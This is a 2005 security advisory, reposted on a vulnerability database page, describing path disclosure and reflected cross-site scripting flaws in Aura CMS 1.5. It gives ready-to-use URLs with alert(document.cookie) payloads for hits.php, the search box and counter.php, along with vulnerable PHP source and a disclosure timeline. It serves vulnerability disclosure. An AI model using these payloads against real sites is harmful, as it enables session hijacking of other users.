Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:7969
HistoryMar 03, 2005 - 12:00 a.m.

Vulnerabilities in Aura CMS

2005-03-0300:00:00
vulners.com
4
JSON
                 Vulnerabilities in Aura CMS

Author: y3dips
Date: Januari, 25th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv011-y3dips-2005.txt

Affected software description:


auraCMS (Content Management System)

version: 1.5
date   : 21 September 2004
lisensi: GPL - http://www.gnu.org/licenses/licenses.html#GPL

Author: Arif Supriyanto - arif@ayo.kliksini.com
        http://www.semarang.tk
          http://www.ayo.kliksini.com
          http://www.auracms.opensource-indonesia.com

Description:

auraCMS is a PHP script package that you to possiblity to building
a website with dynamic content easier and faster, no waste time more.


---------------------------------------------------------------------------

Vulnerabilities:

A. Full Path disclosures

==>> http://[site]/[aura]/?pilih=teman&id=34%60select%20all

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/teman.php on line 9

==>> http://[site]/[aura]/?pilih=hal&id=4%60tes

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/hal.php on line 10

==>> http://[site]/[aura]/?pilih=arsip&topik=1%60

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/arsip.php on line 11

B. Session ID

CMS with This version has two method of authentication (session and cookies) ,
this problem has found in session method .

There are so many variable that havent declared yet, it makes attacker could
exploit it by inputing some "character" n gaining an session id on windows pop up

for eXample

---- hits.php -----

<?
$perintah = "SELECT * FROM counter WHERE id=1";
$hasil = mysql_query( $perintah );
while ($data = mysql_fetch_row($hasil)) {
$hits=$data[3];
}

echo "<b>$hits</b>";

?>

-------end -------

look $hits variable , do you see something interested ? yes SIR , we've found something
lets do some try

==>> http://[site]/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E

then you get the session ID

another vulnerable :

in pencarian (search) input box

  • http://[site]/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search

also in counter module

  • http://[site]/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E

p.s : Wanna know what session IDs gives you ? try google :D

FIx :

founded : Januari 25th 2005
reported to vendor :Februari 15th 2005
;vendor respond but not yet releasing any patch
publish at securityfocus : March 2th 2005

Shoutz:


~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S&#96;to, lirva32, anonymous
~ newbie_hacker@yahoogroups.com ,http://forum.ehco.or.id
~ #e-c-h-o@DALNET

---------------------------------------------------------------------------
Contact:

 y3dips || echo|staff || y3dips[at]gmail[dot]com
 Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

JSON